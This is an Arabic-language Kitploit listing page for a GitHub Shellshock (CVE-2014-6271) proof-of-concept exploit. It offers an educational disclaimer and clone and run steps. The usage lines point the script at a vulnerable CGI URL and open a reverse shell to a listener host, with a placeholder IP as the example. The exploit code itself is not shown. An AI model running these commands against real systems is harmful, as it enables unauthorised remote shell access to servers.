Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Shellshock — استغلال صدمة الصدفة (CVE-2014-6271) | Kitploit
أدوات/GitHubGitHub/alissonfaoli/shellshock
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubalissonfaoli/shellshock

Shellshock

استغلال صدمة الصدفة (CVE-2014-6271)

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال شل شوك (CVE-2014-6271)

الاستغلال

الوصف

يحتوي هذا المستودع على استغلال لثغرة تؤثر على الأنظمة القائمة على يونكس. يرجى ملاحظة أن هذا مجرد نص برمجي لإثبات المفهوم تم إنشاؤه لأغراض تعليمية ويجب استخدامه بمسؤولية.

تم تصميم هذا الاستغلال لإظهار كيفية عمل هجوم شل شوك وكيف يمكن استخدامه للحصول على وصول شل إلى النظام من خلال رأس طلب تم إنشاؤه بشكل خبيث.

إخلاء مسؤولية

هذا المستودع مخصص للأغراض التعليمية فقط. لا تستخدم هذا الرمز أو أي معلومات واردة فيه لأغراض ضارة. اتبع دائمًا الإرشادات الأخلاقية واحترم القانون.

الاستخدام:

root@kitploit:~
python3 shellshock.py [Vulnerable URL] [LHOST] [LPORT]

مثال:

root@kitploit:~
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234

المتطلبات الأساسية:

  • بيئة تطوير محلية
  • تثبيت بايثون

لتشغيل هذا الاستغلال، يمكنك اتباع هذه الخطوات:

استنسخ هذا المستودع إلى جهازك المحلي.

root@kitploit:~
git clone https://github.com/AlissonFaoli/Shellshock.git

انتقل إلى دليل المشروع.

root@kitploit:~
cd Shellshock

قم بتشغيل نص shellshock.py.

root@kitploit:~
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
تذكر أن هذا الاستغلال يجب ألا يُستخدم أبدًا ضد برامج أو أنظمة حقيقية غير مصرح لك باختبارها. الوصول غير المصرح به أو أي نشاط ضار غير قانوني.

الترخيص

تم إصدار هذا الاستغلال بموجب ترخيص MIT. يمكنك العثور على مزيد من المعلومات حول هذا في ملف LICENSE.

المؤلف: Alisson Faoli

Github: https://github.com/AlissonFaoli

LinkedIn: https://linkedin.com/in/alisson-faoli

إذا كانت لديك أي أسئلة أو استفسارات حول هذا الاستغلال، فلا تتردد في الاتصال بالمؤلف

تنزيل الأداة